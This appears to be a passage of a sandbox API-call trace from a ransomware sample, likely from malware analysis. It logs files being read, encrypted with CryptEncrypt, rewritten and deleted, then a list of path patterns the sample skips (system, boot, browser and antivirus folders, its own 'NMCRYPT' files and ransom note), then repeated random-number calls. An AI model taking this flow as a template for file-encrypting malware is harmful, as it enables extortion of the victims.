[0147.570] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.570] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.570] GetLastError () returned 0x0 [0147.570] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.570] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0xd6, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0xd6, lpOverlapped=0x0) returned 1 [0147.570] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0xd6, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0xe0) returned 1 [0147.570] GetLastError () returned 0x0 [0147.570] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0xe0, lpOverlapped=0x0) returned 1 [0147.570] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0147.570] WriteFile (in: hFile=0x588, lpBuffer=0x1d421460*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0147.570] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshi.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshi.xml")) returned 0x20 [0147.570] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshi.xml", dwFileAttributes=0x20) returned 0 [0147.570] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshi.xml") returned 1 [0147.571] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshi.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshi.xml")) returned 0 [0147.571] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshi.xml" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshi.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshi.xml" [0147.571] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshi.xml" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink") returned 1 [0147.571] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXB35D.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxb35d.tmp")) returned 0xb35d [0147.571] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshi.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshi.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXB35D.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxb35d.tmp"), dwFlags=0x1) returned 0 [0147.572] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXB35D.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxb35d.tmp")) returned 1 [0147.572] CryptDestroyKey (hKey=0x9ad7f8) returned 1 [0147.572] wcslen (_String="OK") returned 0x2 [0147.572] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0147.572] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0147.572] CryptDestroyKey (hKey=0x9ad6b8) returned 1 [0147.572] CryptDestroyHash (hHash=0x9ad838) returned 1 [0147.572] CryptReleaseContext (hProv=0x8e2ef0, dwFlags=0x0) returned 1 [0147.572] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0147.572] PathMatchSpecW (pszFile="ipshrv.xml", pszSpec="*NMCRYPT") returned 0 [0147.572] PathMatchSpecW (pszFile="ipshrv.xml", pszSpec="*Recovers your files.html") returned 0 [0147.572] PathMatchSpecW (pszFile="ipshrv.xml", pszSpec="*.exe") returned 0 [0147.572] PathMatchSpecW (pszFile="ipshrv.xml", pszSpec="*.dll") returned 0 [0147.572] PathMatchSpecW (pszFile="ipshrv.xml", pszSpec="*.lnk") returned 0 [0147.572] PathMatchSpecW (pszFile="ipshrv.xml", pszSpec="*.bat") returned 0 [0147.572] PathMatchSpecW (pszFile="ipshrv.xml", pszSpec="*.ini") returned 0 [0147.572] PathMatchSpecW (pszFile="ipshrv.xml", pszSpec="*.msi") returned 0 [0147.572] PathMatchSpecW (pszFile="ipshrv.xml", pszSpec="*.scf") returned 0 [0147.572] PathMatchSpecW (pszFile="ipshrv.xml", pszSpec="*pagefile.sys*") returned 0 [0147.572] PathMatchSpecW (pszFile="ipshrv.xml", pszSpec="*NTUSER.DAT*") returned 0 [0147.572] PathMatchSpecW (pszFile="ipshrv.xml", pszSpec="*AppData*") returned 0 [0147.572] PathMatchSpecW (pszFile="ipshrv.xml", pszSpec="*\\winrar\\*") returned 0 [0147.572] PathMatchSpecW (pszFile="ipshrv.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0147.572] PathMatchSpecW (pszFile="ipshrv.xml", pszSpec="*\\java\\*") returned 0 [0147.572] PathMatchSpecW (pszFile="ipshrv.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0147.572] PathMatchSpecW (pszFile="ipshrv.xml", pszSpec="*\\windows\\*") returned 0 [0147.572] PathMatchSpecW (pszFile="ipshrv.xml", pszSpec="*\\ESET\\*") returned 0 [0147.572] PathMatchSpecW (pszFile="ipshrv.xml", pszSpec="*\\AVG\\*") returned 0 [0147.572] PathMatchSpecW (pszFile="ipshrv.xml", pszSpec="*\\AVIRA\\*") returned 0 [0147.572] PathMatchSpecW (pszFile="ipshrv.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0147.572] PathMatchSpecW (pszFile="ipshrv.xml", pszSpec="*Atheros*") returned 0 [0147.573] PathMatchSpecW (pszFile="ipshrv.xml", pszSpec="*Realtek*") returned 0 [0147.573] PathMatchSpecW (pszFile="ipshrv.xml", pszSpec="*bootmgr*") returned 0 [0147.573] PathMatchSpecW (pszFile="ipshrv.xml", pszSpec="*boot*") returned 0 [0147.573] PathMatchSpecW (pszFile="ipshrv.xml", pszSpec="*boot*") returned 0 [0147.573] PathMatchSpecW (pszFile="ipshrv.xml", pszSpec="*CONFIG.SYS*") returned 0 [0147.573] PathMatchSpecW (pszFile="ipshrv.xml", pszSpec="*IO.SYS*") returned 0 [0147.573] PathMatchSpecW (pszFile="ipshrv.xml", pszSpec="*MSDOS.SYS*") returned 0 [0147.573] PathMatchSpecW (pszFile="ipshrv.xml", pszSpec="*NTDETECT.COM*") returned 0 [0147.573] PathMatchSpecW (pszFile="ipshrv.xml", pszSpec="*ntldr*") returned 0 [0147.573] PathMatchSpecW (pszFile="ipshrv.xml", pszSpec="*chrome*") returned 0 [0147.573] PathMatchSpecW (pszFile="ipshrv.xml", pszSpec="*opera*") returned 0 [0147.573] PathMatchSpecW (pszFile="ipshrv.xml", pszSpec="*firefox*") returned 0 [0147.573] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshrv.xml", pszSpec="*") returned 1 [0147.573] strlen (_Str="NMoreira") returned 0x8 [0147.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, 